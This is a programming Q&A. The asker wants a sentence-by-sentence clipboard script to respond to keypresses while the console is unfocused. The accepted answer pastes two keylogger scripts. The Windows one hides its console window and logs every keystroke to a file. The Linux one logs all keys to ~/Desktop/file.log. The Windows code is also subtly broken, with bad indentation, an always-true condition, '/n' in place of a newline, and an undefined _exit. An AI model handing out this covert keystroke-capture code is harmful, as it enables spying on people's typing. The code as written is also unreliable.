# How to take input even when the console app is not the focused one in Python

Tags: python, python-3.x

```
import pyperclip
text = input("Enter the text: ")
y = -2
def PrintAndWait(x):
    global y
    print(text[y+2:x+1], end="")
    pyperclip.copy(text[y+2:x+1])
    waitingForEnter = input() 
    y = x


for x in range (0,len(text)):
    if text[x]  == "." or text[x]  == "?" or text[x]  == "!":
        PrintAndWait(x)
```

[code](https://pastebin.com/YHcvzKrW)

I made this app that takes a text and splits into sentences and sends a sentence at a time to the clipboard when there's any input from the keyboard.
How can I make it so it does this but when I press a key but the console isn't focused (I mean I'm not directly writing into it)?

I want to make this so I can send a larger text into a conversation one sentence at a time.

Answer (score 0, accepted):

That's not possible using `input()` unless you write a script that listens directly from the keyboard buffer at OS level (i.e a keylogger).

[Here](https://www.geeksforgeeks.org/design-a-keylogger-in-python/) is a promising tutorial on how to do something like this (although I haven't tried it personally).

**Windows**

```
# Python code for keylogger 
# to be used in windows 
import win32api 
import win32console 
import win32gui 
import pythoncom, pyHook 

win = win32console.GetConsoleWindow() 
win32gui.ShowWindow(win, 0) 

def OnKeyboardEvent(event): 
    if event.Ascii==5: 
        _exit(1) 
    if event.Ascii !=0 or 8: 
    #open output.txt to read current keystrokes 
        f = open('c:\output.txt', 'r+') 
        buffer = f.read() 
        f.close() 
    # open output.txt to write current + new keystrokes 
        f = open('c:\output.txt', 'w') 
        keylogs = chr(event.Ascii) 
        if event.Ascii == 13: 
        keylogs = '/n'
        buffer += keylogs 
        f.write(buffer) 
        f.close() 
# create a hook manager object 
hm = pyHook.HookManager() 
hm.KeyDown = OnKeyboardEvent 
# set the hook 
hm.HookKeyboard() 
# wait forever 
pythoncom.PumpMessages()
```

**Linux**

```
# Python code for keylogger 
# to be used in linux 
import os 
import pyxhook 

# This tells the keylogger where the log file will go. 
# You can set the file path as an environment variable ('pylogger_file'), 
# or use the default ~/Desktop/file.log 
log_file = os.environ.get( 
    'pylogger_file', 
    os.path.expanduser('~/Desktop/file.log') 
) 
# Allow setting the cancel key from environment args, Default: ` 
cancel_key = ord( 
    os.environ.get( 
        'pylogger_cancel', 
        '`'
    )[0] 
) 

# Allow clearing the log file on start, if pylogger_clean is defined. 
if os.environ.get('pylogger_clean', None) is not None: 
    try: 
        os.remove(log_file) 
    except EnvironmentError: 
       # File does not exist, or no permissions. 
        pass

#creating key pressing event and saving it into log file 
def OnKeyPress(event): 
    with open(log_file, 'a') as f: 
        f.write('{}\n'.format(event.Key)) 

# create a hook manager object 
new_hook = pyxhook.HookManager() 
new_hook.KeyDown = OnKeyPress 
# set the hook 
new_hook.HookKeyboard() 
try: 
    new_hook.start()         # start the hook 
except KeyboardInterrupt: 
    # User cancelled from command line. 
    pass
except Exception as ex: 
    # Write exceptions to the log file, for analysis later. 
    msg = 'Error while catching events:\n  {}'.format(ex) 
    pyxhook.print_err(msg) 
    with open(log_file, 'a') as f: 
        f.write('\n{}'.format(msg))
```